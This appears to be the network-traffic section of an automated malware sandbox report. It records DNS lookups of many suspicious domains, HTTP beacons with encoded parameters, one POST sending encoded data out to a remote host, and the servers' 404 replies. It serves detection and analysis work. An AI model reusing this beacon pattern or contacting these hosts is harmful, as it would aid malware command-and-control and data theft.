Source: global traffic | HTTP traffic detected: GET /ftr3/?nR=7ghTfXuNFdv7bt0fQ6dp+VYKrg9F0VottJoldp68xQSgk3fAwjETInI5bmz0SHizsmBfpbcRVbCgLhFU68m+g+0qN5CZ17IzjLi3DtoRUNuK8DdWmd+CTazIxVVgqHT8dA==&OJ=btRp HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | Accept-Language: en-US,en | Host: www.quilo.life | Connection: close | User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Source: global traffic | HTTP traffic detected: GET /wjff/?nR=4KVKOjLTUXvpTd2u/bZ1Xtjp48VIQpKAiZnao6g9chZjOHWeMu7z3zqylslmOgP9LXsxnQP9kQW6V1nPysVCefcRDYtQJbJyj2mk5xrQKh9CjNT1kJiwas5jw5tGEdzT0Q==&OJ=btRp HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | Accept-Language: en-US,en | Host: www.qiluqiyuan.buzz | Connection: close | User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Source: global traffic | HTTP traffic detected: GET /3lkx/?nR=RihUS+ZcBcWtP49fbKLPl8hUiWX9OeM0xYk2jkkE+x6ehgmefEg3XF27GOoD6ZAnAm79O7OuHoRKwHtCqV4uYWL7+sOZXKma82UzwNxpRmep+gGd7K5Ptmsj9EAWiB5wAw==&OJ=btRp HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | Accept-Language: en-US,en | Host: www.bola88site.one | Connection: close | User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Source: global traffic | HTTP traffic detected: GET /h5qr/?nR=/bmdZ0vLXnogocV3t4J0vpXKy2/OoNnhB87loKV3gq9LyeQpMfhyu6mMTgPwDPC8F+hhJIsm9BUDnxBtc5ev2o5O2JmBXO2rvj/sbpH3UdghJzgGJYmb4kNKd7aCf9ce4Q==&OJ=btRp HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | Accept-Language: en-US,en | Host: www.kckartal.xyz | Connection: close | User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Source: global traffic | HTTP traffic detected: GET /ed2j/?nR=HnYP2yoU4dt40olsHjvCR7kBP/y2BgIkbcmGMLslyKV8dFp2SGuaYgvLul2clibdaJeHhADQmhDO4iexoifjcdOeiKY5v07N606wVFpuauJi0/RjjYjigABfPEh6YVaweA==&OJ=btRp HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | Accept-Language: en-US,en | Host: www.mizuquan.top | Connection: close | User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Source: global traffic | DNS traffic detected: DNS query: www.monos.shop
Source: global traffic | DNS traffic detected: DNS query: www.726075.buzz
Source: global traffic | DNS traffic detected: DNS query: www.freepicture.online
Source: global traffic | DNS traffic detected: DNS query: www.318st.com
Source: global traffic | DNS traffic detected: DNS query: www.hm62t.top
Source: global traffic | DNS traffic detected: DNS query: www.golbasi-nakliyat.xyz
Source: global traffic | DNS traffic detected: DNS query: www.mfgamecompany.shop
Source: global traffic | DNS traffic detected: DNS query: www.quilo.life
Source: global traffic | DNS traffic detected: DNS query: www.qiluqiyuan.buzz
Source: global traffic | DNS traffic detected: DNS query: www.bola88site.one
Source: global traffic | DNS traffic detected: DNS query: www.kckartal.xyz
Source: global traffic | DNS traffic detected: DNS query: www.mizuquan.top
Source: global traffic | DNS traffic detected: DNS query: www.kxshopmr.store
Source: unknown | HTTP traffic detected: POST /xcfw/ HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | Accept-Encoding: gzip, deflate, br | Accept-Language: en-US,en | Host: www.freepicture.online | Origin: http://www.freepicture.online | Referer: http://www.freepicture.online/xcfw/ | Content-Type: application/x-www-form-urlencoded | Connection: close | Content-Length: 203 | Cache-Control: max-age=0 | User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36 | Data Raw: 6e 52 3d 57 68 2b 56 47 4e 75 4c 42 49 59 61 2f 41 4b 70 77 30 4d 37 4f 6c 64 39 75 71 6d 31 79 5a 56 70 4d 72 46 4a 79 57 45 2f 33 56 38 2f 48 55 66 4d 32 48 49 44 34 59 63 63 73 61 6d 77 58 72 2b 64 47 58 4c 41 49 58 57 79 4b 44 35 39 74 68 51 36 43 47 78 75 71 79 2f 44 46 64 35 54 66 74 4b 42 6d 69 50 54 46 43 31 68 33 61 39 46 69 43 67 34 58 57 55 57 31 41 77 4a 38 68 48 56 54 31 4b 36 31 49 59 37 58 61 78 34 69 2b 6d 44 49 78 30 58 4a 57 52 6b 58 72 58 72 6e 6f 77 2b 5a 45 53 6c 71 4b 54 4e 6f 51 52 43 72 45 71 4f 72 64 68 6e 39 6a 56 52 37 71 69 76 42 79 66 38 43 37 72 65 76 76 57 46 70 32 38 3d | Data Ascii: nR=Wh+VGNuLBIYa/AKpw0M7Old9uqm1yZVpMrFJyWE/3V8/HUfM2HID4YccsamwXr+dGXLAIXWyKD59thQ6CGxuqy/DFd5TftKBmiPTFC1h3a9FiCg4XWUW1AwJ8hHVT1K61IY7Xax4i+mDIx0XJWRkXrXrnow+ZESlqKTNoQRCrEqOrdhn9jVR7qivByf8C7revvWFp28=
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Thu, 12 Sep 2024 11:02:39 GMT | Content-Type: text/html | Content-Length: 138 | Connection: close | ETag: "6663edd0-8a" | Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Thu, 12 Sep 2024 11:02:55 GMT | Server: Apache | Content-Length: 196 | Connection: close | Content-Type: text/html; charset=iso-8859-1 | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Thu, 12 Sep 2024 11:02:57 GMT | Server: Apache | Content-Length: 196 | Connection: close | Content-Type: text/html; charset=iso-8859-1 | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Thu, 12 Sep 2024 11:03:00 GMT | Server: Apache | Content-Length: 196 | Connection: close | Content-Type: text/html; charset=iso-8859-1 | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Thu, 12 Sep 2024 11:03:03 GMT | Server: Apache | Content-Length: 196 | Connection: close | Content-Type: text/html; charset=iso-8859-1 | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 12 Sep 2024 11:03:17 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66a8e223-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 12 Sep 2024 11:03:19 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66a8e223-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 12 Sep 2024 11:03:22 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66a8e223-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 12 Sep 2024 11:03:24 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66a8e223-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Thu, 12 Sep 2024 11:03:38 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-09-12T11:03:43.4315597Z
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 12 Sep 2024 11:03:57 GMTServer: ApacheContent-Length: 514Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 72 65 64 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 62 6c 75 65 22 3e 3c 2f 64 69 76 3e 0a 09 3c 2f 64 69 76 3e 0a 0a 3c 68 31 3e 34 30 34 3a 0a 09 3c 73 6d 61 6c 6c 3e 50 6c 61 79 65 72 73 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 73 6d 61 6c 6c 3e 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" 
href="./style.css"></head><body><!-- partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div><!-- partial --> </body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 12 Sep 2024 11:04:00 GMTServer: ApacheContent-Length: 514Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 72 65 64 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 62 6c 75 65 22 3e 3c 2f 64 69 76 3e 0a 09 3c 2f 64 69 76 3e 0a 0a 3c 68 31 3e 34 30 34 3a 0a 09 3c 73 6d 61 6c 6c 3e 50 6c 61 79 65 72 73 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 73 6d 61 6c 6c 3e 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" 
href="./style.css"></head><body><!-- partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div><!-- partial --> </body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 12 Sep 2024 11:04:02 GMTServer: ApacheContent-Length: 514Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 72 65 64 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 62 6c 75 65 22 3e 3c 2f 64 69 76 3e 0a 09 3c 2f 64 69 76 3e 0a 0a 3c 68 31 3e 34 30 34 3a 0a 09 3c 73 6d 61 6c 6c 3e 50 6c 61 79 65 72 73 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 73 6d 61 6c 6c 3e 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" 
href="./style.css"></head><body><!-- partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div><!-- partial --> </body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 12 Sep 2024 11:04:05 GMTServer: ApacheContent-Length: 514Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 72 65 64 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 62 6c 75 65 22 3e 3c 2f 64 69 76 3e 0a 09 3c 2f 64 69 76 3e 0a 0a 3c 68 31 3e 34 30 34 3a 0a 09 3c 73 6d 61 6c 6c 3e 50 6c 61 79 65 72 73 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 73 6d 61 6c 6c 3e 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" 
href="./style.css"></head><body><!-- partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div><!-- partial --> </body></html>
